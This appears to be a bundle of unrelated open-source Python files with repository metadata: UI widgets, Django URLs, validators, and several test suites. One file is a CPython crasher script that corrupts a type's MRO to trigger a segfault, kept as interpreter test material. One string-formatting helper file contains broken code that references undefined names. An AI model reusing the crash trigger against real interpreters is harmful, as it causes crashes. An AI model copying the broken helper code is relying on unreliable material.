self.c1 = ui.CheckBox(text='apple')
self.c2 = ui.CheckBox(text='banana')
self.c3 = ui.CheckBox(text='pear')
self.checklabel = ui.Label(text='...')
class JS:
@event.connect('b1.mouse_click', 'b2.mouse_click','b3.mouse_click', )
def _button_clicked(self, *events):
ev = events[-1]
self.buttonlabel.text = 'Clicked on the ' + ev.source.text
@event.connect('r1.checked', 'r2.checked','r3.checked')
def _radio_changed(self, *events):
# There will also be events for radio buttons being unchecked, but
# Flexx ensures that the last event is for the one being checked
ev = events[-1]
self.radiolabel.text = 'Selected the ' + ev.source.text
@event.connect('c1.checked', 'c2.checked','c3.checked', )
def _check_changed(self, *events):
selected = [c.text for c in (self.c1, self.c2, self.c3) if c.checked]
if selected:
self.checklabel.text = 'Selected: ' + ', '.join(selected)
else:
self.checklabel.text = 'None selected'
"""
from ... import event
from . import Widget
class BaseButton(Widget):
""" Abstract button class.
"""
CSS = """
.flx-BaseButton {
white-space: nowrap;
}
.flx-RadioButton, .flx-CheckBox {
margin-left: 0.5em;
margin-right: 0.5em;
}
.flx-RadioButton label, .flx-CheckBox label {
margin-left: 0.2em;
}
"""
class Both:
@event.prop
def text(self, v=''):
""" The text on the button.
"""
return str(v)
@event.prop
def checked(self, v=False):
""" Whether the button is checked. Applicable for CheckBox,
RadioButton and ToggleButton.
"""
return bool(v)
@event.prop
def disabled(self, v=False):
""" Whether the button is disabled.
"""
return bool(v)
class JS:
@event.emitter
def mouse_click(self, e):
""" Event emitted when the mouse is clicked.
See mouse_down() for a description of the event object.
"""
return self._create_mouse_event(e)
class Button(BaseButton):
""" A push button.
"""
class JS:
def _init_phosphor_and_node(self):
self.phosphor = self._create_phosphor_widget('button')
self.node = self.phosphor.node
self.node.addEventListener('click', self.mouse_click, 0)
@event.connect('text')
def __text_changed(self, *events):
self.node.innerHTML = events[-1].new_value
@event.connect('disabled')
def __disabled_changed(self, *events):
if events[-1].new_value:
self.node.setAttribute("disabled", "disabled")
else:
self.node.removeAttribute("disabled")
class ToggleButton(BaseButton):
""" A button that can be toggled. It behaves like a checkbox, while
looking more like a regular button.
"""
CSS = """
.flx-ToggleButton-checked {
color: #00B;
font-weight: bolder;
}
"""
class JS:
def _init_phosphor_and_node(self):
self.phosphor = self._create_phosphor_widget('button')
self.node = self.phosphor.node
self.node.addEventListener('click', self.mouse_click, 0)
@event.connect('text')
def __text_changed(self, *events):
self.node.innerHTML = events[-1].new_value
@event.connect('mouse_click')
def __toggle_checked(self, *events):
self.checked = not self.checked
@event.connect('checked')
def __check_changed(self, *events):
if self.checked:
self.node.classList.add('flx-ToggleButton-checked')
else:
self.node.classList.remove('flx-ToggleButton-checked')
class RadioButton(BaseButton):
""" A radio button. Of any group of radio buttons that share the
same parent, only one can be active.
"""
class JS:
def _init_phosphor_and_node(self):
self.phosphor = p = self._create_phosphor_widget('div')
template = '<input type="radio" id="ID"><label for="ID">'
p.node.innerHTML = template.replace('ID', self.id)
self.node = p.node.childNodes[0]
self.text_node = p.node.childNodes[1]
self.node.addEventListener('click', self._check_radio_click, 0)
@event.connect('parent')
def __update_group(self, *events):
if self.parent:
self.node.name = self.parent.id
@event.connect('text')
def __text_changed(self, *events):
#self.node.innerHTML = events[-1].new_value
self.text_node.innerHTML = events[-1].new_value
@event.connect('checked')
def __check_changed(self, *events):
self.node.checked = self.checked
def _check_radio_click(self, ev):
""" This method is called on JS a click event. We *first* update
the checked properties, and then emit the Flexx click event.
That way, one can connect to the click event and have an
up-to-date checked props (even on Py).
"""
# Turn off any radio buttons in the same group
if self.parent:
for child in self.parent.children:
if isinstance(child, RadioButton) and child is not self:
child.checked = child.node.checked
# Turn on this button (last)
self.checked = self.node.checked
# Process actual click event
self.mouse_click(ev)
class CheckBox(BaseButton):
""" A checkbox button.
"""
class JS:
def _init_phosphor_and_node(self):
self.phosphor = p = self._create_phosphor_widget('div')
template = '<input type="checkbox" id="ID"><label for="ID">'
p.node.innerHTML = template.replace('ID', self.id)
self.node = p.node.childNodes[0]
self.text_node = p.node.childNodes[1]
self.node.addEventListener('click', self.mouse_click, 0)
self.node.addEventListener('change', self._check_changed_from_dom, 0)
@event.connect('text')
def __text_changed(self, *events):
#self.node.innerHTML = events[-1].new_value
self.text_node.innerHTML = events[-1].new_value
@event.connect('checked')
def __check_changed(self, *events):
self.node.checked = self.checked
def _check_changed_from_dom(self, ev):
self.checked = self.node.checked
| {
"content_hash": "15eac81648155acaab27ee65d4a4277c",
"timestamp": "",
"source": "github",
"line_count": 241,
"max_line_length": 85,
"avg_line_length": 31.738589211618258,
"alnum_prop": 0.5450385671329585,
"repo_name": "JohnLunzer/flexx",
"id": "b66a89b1d0e9a741067a8c7c3968466f0ab825fd",
"size": "7649",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "flexx/ui/widgets/_button.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "HTML",
"bytes": "3085"
},
{
"name": "JavaScript",
"bytes": "2932"
},
{
"name": "Python",
"bytes": "1193274"
}
],
"symlink_target": ""
} |
import types
import collections
__all__ = ("wrap", "indent", "Join", "fl", "fd")
# ------------------------------------------------------------
def wrap(s, wrapping):
"Wrap a string s before and after with the value of wrapping."
return "{0}{1}{0}".format(wrapping, s)
def bpad(s, padding="\n\n"):
"Pad a string s before and after with two newlines."
return wrap(s, padding)
def indent(s, padding=" ", depth=1):
"Pad the start of s with padding repeated depth times."
return "{0}{1}".format(padding * depth, s)
def lpad(s, padding=" "):
"Pad the start of a string s with the value of padding."
return wrap(s, padding)
# ------------------------------------------------------------
def ljoin(l):
"Joins a list with newlines."
return "\n".join(l)
def cjoin(l):
"Joins a list with commas."
return ", ".join(l)
def sjoin(l):
"Joins a list with commas."
return " ".join(l)
class Join(object):
l = ljoin
c = cjoin
s = sjoin
# ------------------------------------------------------------
def get_column_formatter(*cols):
fmt_string = sjoin("{{{0}{1}}}".format(i, c) for i, c in enumerate(cols))
def fmt_columns(*items):
if len(items) == 1 and isinstance(items, list):
items = items[0]
return fmt_string.format(*items)
return fmt_columns
# ------------------------------------------------------------
_list_column_formatter = get_column_formatter(":>10", "!s")
def fl(l):
"Format a list as idx: value pairs on separate lines."
return ljoin(_list_column_formatter(i + 1, v) for i, v in enumerate(l))
_dict_column_formatter = get_column_formatter(":20", "!s")
def fd(d, order_by_value=False):
"Format a dictionary as key: value pairs on separate lines, in sorted key order by default."
items = sorted(d.items(), key=lambda k: (v if order_by_value else k))
return ljoin(_dict_column_formatter(*i) for i in items)
# ------------------------------------------------------------
def main(argv=None):
"""Run as a command-line script: colorize a python file or stdin using ANSI
color escapes and print(to stdout.)
Inputs:
- argv(None): a list of strings like sys.argv[1:] giving the command-line
arguments. If None, use sys.argv[1:].
"""
usage_msg = """%prog [options] [filename]
Colorize a python file or stdin using ANSI color escapes and print(to stdout.)
If no filename is given, or if filename is -, read standard input."""
parser = optparse.OptionParser(usage=usage_msg)
newopt = parser.add_option
newopt('-s','--scheme',metavar='NAME',dest='scheme_name',action='store',
choices=['Linux','LightBG','NoColor'],default=_scheme_default,
help="give the color scheme to use. Currently only 'Linux'\
(default) and 'LightBG' and 'NoColor' are implemented (give without\
quotes)")
opts,args = parser.parse_args(argv)
if len(args) > 1:
parser.error("you must give at most one filename.")
if len(args) == 0:
fname = '-' # no filename given; setup to read from stdin
else:
fname = args[0]
if fname == '-':
stream = sys.stdin
else:
stream = file(fname)
parser = Parser()
# we need nested try blocks because pre-2.5 python doesn't support unified
# try-except-finally
try:
try:
# write colorized version to stdout
parser.format(stream.read(),scheme=opts.scheme_name)
except IOError as msg:
# if user reads through a pager and quits, don't print(traceback)
if msg.args != (32,'Broken pipe'):
raise
finally:
if stream is not sys.stdin:
stream.close() # in case a non-handled exception happened above
if __name__ == "__main__":
main()
| {
"content_hash": "9c8fce54f98816540fb716826e99d1a6",
"timestamp": "",
"source": "github",
"line_count": 133,
"max_line_length": 94,
"avg_line_length": 28.36842105263158,
"alnum_prop": 0.5791147627882322,
"repo_name": "spiralx/mypy",
"id": "ed5f755663e8ea7e304a657af00ad21116c77f4f",
"size": "3782",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mypy/st.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "109682"
},
{
"name": "JavaScript",
"bytes": "170251"
},
{
"name": "Python",
"bytes": "298163"
},
{
"name": "Shell",
"bytes": "81"
}
],
"symlink_target": ""
} |
"""Cloud browser URLs."""
from django.conf.urls import patterns, url
from django.views.generic.base import RedirectView
from cloud_browser.app_settings import settings
from cloud_browser.views import UploadFileView, MkdirView, DeleteView, \
RenameView, MoveFileView
# pylint: disable=invalid-name, no-value-for-parameter
urlpatterns = patterns(
'cloud_browser.views',
url(r'^$',
RedirectView.as_view(url='browser'),
name="cloud_browser_index"),
url(r'^browser/(?P<path>.*)$', 'browser', name="cloud_browser_browser"),
url(r'^document/(?P<path>.*)$', 'document', name="cloud_browser_document"),
url(r'^upload/$', UploadFileView.as_view(), name='upload'),
url(r'^mkdir/$', MkdirView.as_view(), name='mkdir'),
url(r'^delete/$', DeleteView.as_view(), name='delete'),
url(r'^rename/$', RenameView.as_view(), name='rename'),
url(r'^move/$', MoveFileView.as_view(), name='move'),
)
if settings.app_media_url is None:
# Use a static serve.
urlpatterns += patterns(
'',
url(r'^app_media/(?P<path>.*)$', 'django.views.static.serve',
{'document_root': settings.app_media_doc_root},
name="cloud_browser_media"),
)
| {
"content_hash": "e81873efeb30f18f9537a807df0758a0",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 79,
"avg_line_length": 39.12903225806452,
"alnum_prop": 0.6430338004946414,
"repo_name": "lantip/aws-filemanager",
"id": "68a983e02b047afb0b7e054502173c2becc8c44e",
"size": "1213",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cloud_browser/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4449"
},
{
"name": "HTML",
"bytes": "14401"
},
{
"name": "JavaScript",
"bytes": "5794"
},
{
"name": "Python",
"bytes": "133825"
}
],
"symlink_target": ""
} |
from arsenalExtractor import *
class ExtractionFactory:
def createExtractor(self, team):
if team == "Arsenal":
return ArsenalExtractor()
| {
"content_hash": "870631ded2246f784a9ec226c2cae830",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 36,
"avg_line_length": 22.714285714285715,
"alnum_prop": 0.6855345911949685,
"repo_name": "DownCastAce/SoccerFixtureService",
"id": "fa15be59c957b7e8152f9abf8fea175a4ccdaf1f",
"size": "159",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "extractionFactory.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "2201"
}
],
"symlink_target": ""
} |
from django.test import TestCase
from django.core.exceptions import ValidationError
from django_dynamic_fixture import G
from nose.plugins.attrib import attr
from oscar.core.compat import get_user_model
from oscar.apps.catalogue.reviews import models
from oscar.test.factories import create_product
User = get_user_model()
@attr('reviews')
class TestAnAnonymousReview(TestCase):
def setUp(self):
self.product = create_product()
self.data = {
'product': self.product,
'title': 'This product is lovely',
'body': 'I really like this cheese',
'score': 0,
'name': 'JR Hartley',
'email': 'hartley@example.com'
}
def review(self, **kwargs):
if kwargs:
data = self.data.copy()
data.update(kwargs)
else:
data = self.data
return models.ProductReview(**data)
def test_can_be_created(self):
review = self.review()
review.full_clean()
def test_requires_a_title(self):
review = self.review(title="")
self.assertRaises(ValidationError, review.full_clean)
def test_requires_a_body(self):
review = self.review(body="")
self.assertRaises(ValidationError, review.full_clean)
def test_requires_a_name(self):
review = self.review(name="")
self.assertRaises(ValidationError, review.full_clean)
def test_requires_an_email_address(self):
review = self.review(email="")
self.assertRaises(ValidationError, review.full_clean)
def test_requires_non_whitespace_title(self):
review = self.review(title=" ")
self.assertRaises(ValidationError, review.full_clean)
def test_starts_with_no_votes(self):
review = self.review()
review.save()
self.assertFalse(review.has_votes)
self.assertEquals(0, review.num_up_votes)
self.assertEquals(0, review.num_down_votes)
def test_has_reviewer_name_property(self):
review = self.review(name="Dave")
self.assertEquals("Dave", review.reviewer_name)
@attr('reviews')
class TestAUserReview(TestCase):
def setUp(self):
self.product = create_product()
self.user = G(User, first_name="Tom", last_name="Thumb")
self.data = {
'product': self.product,
'title': 'This product is lovely',
'body': 'I really like this cheese',
'score': 0,
'user': self.user
}
def review(self, **kwargs):
if kwargs:
data = self.data.copy()
data.update(kwargs)
else:
data = self.data
return models.ProductReview(**data)
def test_can_be_created(self):
review = self.review()
review.full_clean()
def test_requires_a_title(self):
review = self.review(title="")
self.assertRaises(ValidationError, review.full_clean)
def test_requires_a_body(self):
review = self.review(body="")
self.assertRaises(ValidationError, review.full_clean)
def test_has_reviewer_name_property(self):
review = self.review()
self.assertEquals("Tom Thumb", review.reviewer_name)
@attr('reviews')
class TestVotingOnAReview(TestCase):
def setUp(self):
self.product = create_product()
self.user = G(User)
self.voter = G(User)
self.review = self.product.reviews.create(
title='This is nice',
score=3,
body="This is the body",
user=self.user)
def test_updates_totals_for_upvote(self):
self.review.vote_up(self.voter)
self.assertTrue(self.review.has_votes)
self.assertEquals(1, self.review.total_votes)
self.assertEquals(1, self.review.delta_votes)
def test_updates_totals_for_downvote(self):
self.review.vote_down(self.voter)
self.assertTrue(self.review.has_votes)
self.assertEquals(1, self.review.total_votes)
self.assertEquals(-1, self.review.delta_votes)
def test_is_permitted_for_normal_user(self):
is_allowed, reason = self.review.can_user_vote(self.voter)
self.assertTrue(is_allowed, reason)
def test_is_not_permitted_for_reviewer(self):
is_allowed, reason = self.review.can_user_vote(self.user)
self.assertFalse(is_allowed, reason)
def test_is_not_permitted_for_previous_voter(self):
self.review.vote_up(self.voter)
is_allowed, reason = self.review.can_user_vote(self.voter)
self.assertFalse(is_allowed, reason)
| {
"content_hash": "455cfe7468034bba921bbd2737737ccb",
"timestamp": "",
"source": "github",
"line_count": 146,
"max_line_length": 66,
"avg_line_length": 31.5,
"alnum_prop": 0.6236138290932811,
"repo_name": "Idematica/django-oscar",
"id": "61cef0313c0b903ac4752c771fdc9abe2c3f7f0f",
"size": "4599",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "tests/integration/catalogue/reviews/model_tests.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "1099824"
},
{
"name": "JavaScript",
"bytes": "818932"
},
{
"name": "Puppet",
"bytes": "3507"
},
{
"name": "Python",
"bytes": "4079718"
},
{
"name": "Shell",
"bytes": "5760"
},
{
"name": "XSLT",
"bytes": "49764"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals, print_function, absolute_import
#
# Copyright 2015 MarkLogic Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0#
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# File History
# ------------
#
# Paul Hoehne 03/05/2015 Initial development
#
"""
Validators are utility functions used by various classes to validate
input.
"""
class ValidationError(Exception):
"""
A validation error class
"""
def __init__(self, message, original_value):
self._message = message
self._original_value = original_value
def __repr__(self):
"Validation Error('{0}', {1})".format(self._message, self._original_value)
def validate_boolean(raw_val):
"""
Validate a boolean.
"""
if type(raw_val) != bool:
raise ValidationError('Value passed is not a boolean', repr(raw_val))
def validate_index_type(raw_val):
"""
Validate a scalar index type.
"""
valid_index_types = {"int", "unsignedInt", "long", "unsignedLong", "float", "double", "decimal", "dateTime",
"time", "date", "gYearMonth", "gYear", "gMonth", "gDay", "yearMonthDuration",
"dayTimeDuration", "string", "anyURI"}
if raw_val not in valid_index_types:
raise ValidationError('Value is not a valid index type', repr(raw_val))
def validate_index_invalid_value_actions(raw_val):
"""
Validate the invalid value actions on an index.
"""
valid_actions = {'ignore', 'reject'}
if raw_val not in valid_actions:
raise ValidationError("Value is not a valid action for invalid index values", repr(raw_val))
def validate_stemmed_searches_type(raw_val):
"""
Validate the stemmed searches value.
"""
valid_types = {'off', 'basic', 'advanced', 'decompounding'}
if raw_val not in valid_types:
raise ValidationError("Stemmed search type is not a valid type of stemmed search", repr(raw_val))
def validate_integer_range(raw_val, min, max):
"""
Validate an intenger in a range.
"""
if raw_val not in range(min, (1 + max)):
raise ValidationError("Integer value out of range", repr(raw_val))
def validate_directory_creation(raw_val):
"""
Validate the directory creation setting.
"""
if raw_val not in ['manual', 'automatic', 'manual-enforced']:
raise ValidationError("Invalid directory creation method", repr(raw_val))
def validate_locking_type(raw_val):
"""
Validate locking type.
"""
if raw_val not in ['strict', 'fast', 'off']:
raise ValidationError("Invalid locking option", repr(raw_val))
def validate_range_index_optimize_options(raw_val):
"""
Validate a range index optimization option.
"""
if raw_val not in ['facet-time', 'memory-size']:
raise ValidationError("Range index optimize option is not a valid value", repr(raw_val))
def validate_format_compatibility_options(raw_val):
"""
Validate a format compatability option.
"""
if raw_val not in ['5.0', '4.2', '4.1', '4.0', '3.2']:
raise ValidationError("On disk index format comatibility objest is not a valide value", repr(raw_val))
def validate_index_detection_options(raw_val):
"""
Validate an index detection option.
"""
if raw_val not in ['automatic', 'none']:
raise ValidationError("Index detection options is not a valid value", repr(raw_val))
def validate_expunge_locks_options(raw_val):
"""
Validate an expunge locks option.
"""
if raw_val not in ['automatic', 'none']:
raise ValidationError("Expunge locks option is not a valid value", repr(raw_val))
def validate_term_frequency_normalization_options(raw_val):
"""
Validate a term frequency normalization option.
"""
if raw_val not in ['unscaled-log', 'weakest-scaled-log', 'weakly-scaled-log', 'moderately-scaled-log',
'strongly-scaled-log', 'scaled-log']:
raise ValidationError("Term frequency normalization option is not a valid value", repr(raw_val))
def validate_merge_priority_options(raw_val):
"""
Validate a merge priority optoin.
"""
if raw_val not in ['lower', 'normal']:
raise ValidationError("Merge priority option is not a valid value", repr(raw_val))
def validate_assignment_policy_options(raw_val):
"""
Validate an assignment policy option.
"""
if raw_val not in ['bucket', 'statistical', 'range', 'legacy']:
raise ValidationError("Assignment policy option is not a valid value", repr(raw_val))
def validate_privilege_kind(raw_val):
"""
Validate a privilege kind.
"""
if raw_val not in ['uri', 'execute']:
raise ValidationError("Privilege kind is not a valid value", repr(raw_val))
def validate_custom(message):
"""
Raise a validation error.
"""
raise ValidationError("Validation error", repr(message))
def validate_forest_availability(raw_val):
"""
Validate a forest availability value.
"""
if raw_val not in ['online', 'offline']:
raise ValidationError("Forest availability status is not a valid value", repr(raw_val))
def validate_string(raw_val):
"""
Validate that the value is a string.
"""
if type(raw_val) is not str:
raise ValidationError("String expected.", repr(raw_val))
def validate_list_of_strings(raw_val):
"""
Validate that the value is a list of strings.
"""
if type(raw_val) is not list:
raise ValidationError("List of strings expected.", repr(raw_val))
for value in raw_val:
if type(value) is not str:
raise ValidationError("List of strings expected.", repr(raw_val))
def validate_coordinate_system(raw_val):
"""
Validate a geospatial index coordinate system.
"""
if raw_val not in ['wgs84', 'raw']:
raise ValidationError("Invalid coordinate system", repr(raw_val))
def validate_point_format(raw_val):
"""
Validate a geospatial index point format.
"""
if raw_val not in ['point', 'lat-long-point']:
raise ValidationError("Invalid point format", repr(raw_val))
def validate_capability(raw_val):
"""
Validate a capability.
"""
if raw_val not in ['read', 'insert', 'update', 'execute']:
raise ValidationError("Invalid capability", repr(raw_val))
def validate_collation(index_type, collation):
"""
Validate a colation for an index type.
"""
# FIXME: really validate the collation string!
if index_type == "string":
return
if (index_type == "anyURI"
and collation == "http://marklogic.com/collation/codepoint"):
return
if collation is None or collation == "":
return
raise ValidationError('Collation cannot be {0} for an index of type {1}' \
.format(index_type, collation))
def validate_type(raw_val, cls):
"""
Validate that the value is of the specified type.
"""
if not isinstance(raw_val, cls):
raise ValidationError('Value passed is not a {0}' \
.format(cls.__name__), repr(raw_val))
def assert_type(raw_val, cls):
"""
Assert that the value is of the specified type.
:return The value if it passes the type test, otherwise raise an exception
"""
if isinstance(raw_val, cls):
return raw_val
raise ValidationError('Value passed is not a {0}' \
.format(cls.__name__), repr(raw_val))
def assert_boolean(raw_val):
"""
Assert that the value is boolean.
:return The value if it is boolean, otherwise raise an exception
"""
return assert_type(raw_val, bool)
def validate_list_of_type(raw_val, cls):
"""
Validate a list of the specified type.
"""
if type(raw_val) is not list:
raise ValidationError("List of {0} expected.".format(cls.__name__),
repr(raw_val))
for value in raw_val:
if type(value) is not cls:
raise ValidationError("List of {0} expected.".format(cls.__name__),
repr(raw_val))
def assert_list_of_type(raw_val, cls):
"""
Assert that the value is a list of the specified type.
A single value of the specified type is returned as a list of length 1.
:return The value if it is an appropriate list, otherwise raise an exception
"""
if type(raw_val) is cls:
return [ raw_val ]
validate_list_of_type(raw_val, cls)
return raw_val
| {
"content_hash": "4b0fb273c1f2677d1073f0deeeeb27f0",
"timestamp": "",
"source": "github",
"line_count": 285,
"max_line_length": 112,
"avg_line_length": 31.512280701754385,
"alnum_prop": 0.6411312771406302,
"repo_name": "supriyantomaftuh/python_api",
"id": "83fb49bfe0b0f5e7259d8c84d71a6eedc018d45d",
"size": "9005",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python_api/marklogic/utilities/validators.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "213"
},
{
"name": "Python",
"bytes": "719010"
},
{
"name": "Shell",
"bytes": "2535"
}
],
"symlink_target": ""
} |
"""
There is a way to put keys of any type in a type's dictionary.
I think this allows various kinds of crashes, but so far I have only
found a convoluted attack of _PyType_Lookup(), which uses the mro of the
type without holding a strong reference to it. Probably works with
super.__getattribute__() too, which uses the same kind of code.
"""
class MyKey(object):
def __hash__(self):
return hash('mykey')
def __cmp__(self, other):
# the following line decrefs the previous X.__mro__
X.__bases__ = (Base2,)
# trash all tuples of length 3, to make sure that the items of
# the previous X.__mro__ are really garbage
z = []
for i in range(1000):
z.append((i, None, None))
return -1
class Base(object):
mykey = 'from Base'
class Base2(object):
mykey = 'from Base2'
# you can't add a non-string key to X.__dict__, but it can be
# there from the beginning :-)
X = type('X', (Base,), {MyKey(): 5})
print(X.mykey)
# I get a segfault, or a slightly wrong assertion error in a debug build.
| {
"content_hash": "1df3f1c1fb593d6472d435a900888af6",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 73,
"avg_line_length": 30.857142857142858,
"alnum_prop": 0.6324074074074074,
"repo_name": "MalloyPower/parsing-python",
"id": "a8c6e63ee2bc7562c435b4541bb2784fdc2e3c86",
"size": "1080",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "front-end/testsuite-python-lib/Python-3.0/Lib/test/crashers/loosing_mro_ref.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "1963"
},
{
"name": "Lex",
"bytes": "238458"
},
{
"name": "Makefile",
"bytes": "4513"
},
{
"name": "OCaml",
"bytes": "412695"
},
{
"name": "Python",
"bytes": "17319"
},
{
"name": "Rascal",
"bytes": "523063"
},
{
"name": "Yacc",
"bytes": "429659"
}
],
"symlink_target": ""
} |
import numpy
from numpy.testing import assert_almost_equal
import torch
from torch.nn.parameter import Parameter
from torch.autograd import Variable
from allennlp.common import Params
from allennlp.modules.similarity_functions import LinearSimilarity
from allennlp.common.testing import AllenNlpTestCase
class TestLinearSimilarityFunction(AllenNlpTestCase):
# pylint: disable=protected-access
def test_weights_are_correct_sizes(self):
linear = LinearSimilarity(tensor_1_dim=3, tensor_2_dim=6, combination='x,y')
assert list(linear._weight_vector.size()) == [9]
assert list(linear._bias.size()) == [1]
def test_forward_does_a_weighted_product(self):
linear = LinearSimilarity(3, 1, combination='x,y')
linear._weight_vector = Parameter(torch.FloatTensor([-.3, .5, 2.0, -1.0]))
linear._bias = Parameter(torch.FloatTensor([.1]))
a_vectors = torch.FloatTensor([[[1, 1, 1], [-1, -1, 0]]])
b_vectors = torch.FloatTensor([[[0], [1]]])
result = linear(Variable(a_vectors), Variable(b_vectors)).data.numpy()
assert result.shape == (1, 2,)
assert_almost_equal(result, [[2.3, -1.1]])
def test_forward_works_with_higher_order_tensors(self):
linear = LinearSimilarity(7, 7, combination='x,y')
weights = numpy.random.rand(14)
linear._weight_vector = Parameter(torch.from_numpy(weights).float())
linear._bias = Parameter(torch.FloatTensor([0.]))
a_vectors = numpy.random.rand(5, 4, 3, 6, 7)
b_vectors = numpy.random.rand(5, 4, 3, 6, 7)
result = linear(Variable(torch.from_numpy(a_vectors).float()),
Variable(torch.from_numpy(b_vectors).float()))
result = result.data.numpy()
assert result.shape == (5, 4, 3, 6)
combined_vectors = numpy.concatenate([a_vectors[3, 2, 1, 3, :], b_vectors[3, 2, 1, 3, :]])
expected_result = numpy.dot(combined_vectors, weights)
assert_almost_equal(result[3, 2, 1, 3], expected_result, decimal=6)
def test_forward_works_with_multiply_combinations(self):
linear = LinearSimilarity(2, 2, combination='x*y')
linear._weight_vector = Parameter(torch.FloatTensor([-.3, .5]))
linear._bias = Parameter(torch.FloatTensor([0]))
a_vectors = Variable(torch.FloatTensor([[1, 1], [-1, -1]]))
b_vectors = Variable(torch.FloatTensor([[1, 0], [0, 1]]))
result = linear(a_vectors, b_vectors).data.numpy()
assert result.shape == (2,)
assert_almost_equal(result, [-.3, -.5])
def test_forward_works_with_divide_combinations(self):
linear = LinearSimilarity(2, 2, combination='x/y')
linear._weight_vector = Parameter(torch.FloatTensor([-.3, .5]))
linear._bias = Parameter(torch.FloatTensor([0]))
a_vectors = Variable(torch.FloatTensor([[1, 1], [-1, -1]]))
b_vectors = Variable(torch.FloatTensor([[1, 2], [2, 1]]))
result = linear(a_vectors, b_vectors).data.numpy()
assert result.shape == (2,)
assert_almost_equal(result, [-.05, -.35])
def test_forward_works_with_add_combinations(self):
linear = LinearSimilarity(2, 2, combination='x+y')
linear._weight_vector = Parameter(torch.FloatTensor([-.3, .5]))
linear._bias = Parameter(torch.FloatTensor([0]))
a_vectors = Variable(torch.FloatTensor([[1, 1], [-1, -1]]))
b_vectors = Variable(torch.FloatTensor([[1, 0], [0, 1]]))
result = linear(a_vectors, b_vectors).data.numpy()
assert result.shape == (2,)
assert_almost_equal(result, [-.1, .3])
def test_forward_works_with_subtract_combinations(self):
linear = LinearSimilarity(2, 2, combination='x-y')
linear._weight_vector = Parameter(torch.FloatTensor([-.3, .5]))
linear._bias = Parameter(torch.FloatTensor([0]))
a_vectors = Variable(torch.FloatTensor([[1, 1], [-1, -1]]))
b_vectors = Variable(torch.FloatTensor([[1, 0], [0, 1]]))
result = linear(a_vectors, b_vectors).data.numpy()
assert result.shape == (2,)
assert_almost_equal(result, [.5, -.7])
def test_can_construct_from_params(self):
params = Params({
'tensor_1_dim': 4,
'tensor_2_dim': 4,
'combination': 'x,y,x*y,y-x'
})
linear = LinearSimilarity.from_params(params)
assert list(linear._weight_vector.size()) == [16]
| {
"content_hash": "449a3b376592301fbaf7d42f0c90a3d8",
"timestamp": "",
"source": "github",
"line_count": 90,
"max_line_length": 98,
"avg_line_length": 49.522222222222226,
"alnum_prop": 0.6161094906888042,
"repo_name": "nafitzgerald/allennlp",
"id": "2a5a64030133c129f629f847f1dbedfe9cccf219",
"size": "4501",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/modules/similarity_functions/linear_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "5564"
},
{
"name": "Cuda",
"bytes": "18610"
},
{
"name": "Jupyter Notebook",
"bytes": "36610"
},
{
"name": "Makefile",
"bytes": "1478"
},
{
"name": "Perl",
"bytes": "43067"
},
{
"name": "Python",
"bytes": "1247761"
},
{
"name": "Shell",
"bytes": "13919"
}
],
"symlink_target": ""
} |
r"""Support for regular expressions (RE).
This module provides regular expression matching operations similar to
those found in Perl. It supports both 8-bit and Unicode strings; both
the pattern and the strings being processed can contain null bytes and
characters outside the US ASCII range.
Regular expressions can contain both special and ordinary characters.
Most ordinary characters, like "A", "a", or "0", are the simplest
regular expressions; they simply match themselves. You can
concatenate ordinary characters, so last matches the string 'last'.
The special characters are:
"." Matches any character except a newline.
"^" Matches the start of the string.
"$" Matches the end of the string or just before the newline at
the end of the string.
"*" Matches 0 or more (greedy) repetitions of the preceding RE.
Greedy means that it will match as many repetitions as possible.
"+" Matches 1 or more (greedy) repetitions of the preceding RE.
"?" Matches 0 or 1 (greedy) of the preceding RE.
*?,+?,?? Non-greedy versions of the previous three special characters.
{m,n} Matches from m to n repetitions of the preceding RE.
{m,n}? Non-greedy version of the above.
"\\" Either escapes special characters or signals a special sequence.
[] Indicates a set of characters.
A "^" as the first character indicates a complementing set.
"|" A|B, creates an RE that will match either A or B.
(...) Matches the RE inside the parentheses.
The contents can be retrieved or matched later in the string.
(?aiLmsux) Set the A, I, L, M, S, U, or X flag for the RE (see below).
(?:...) Non-grouping version of regular parentheses.
(?P<name>...) The substring matched by the group is accessible by name.
(?P=name) Matches the text matched earlier by the group named name.
(?#...) A comment; ignored.
(?=...) Matches if ... matches next, but doesn't consume the string.
(?!...) Matches if ... doesn't match next.
(?<=...) Matches if preceded by ... (must be fixed length).
(?<!...) Matches if not preceded by ... (must be fixed length).
(?(id/name)yes|no) Matches yes pattern if the group with id/name matched,
the (optional) no pattern otherwise.
The special sequences consist of "\\" and a character from the list
below. If the ordinary character is not on the list, then the
resulting RE will match the second character.
\number Matches the contents of the group of the same number.
\A Matches only at the start of the string.
\Z Matches only at the end of the string.
\b Matches the empty string, but only at the start or end of a word.
\B Matches the empty string, but not at the start or end of a word.
\d Matches any decimal digit; equivalent to the set [0-9] in
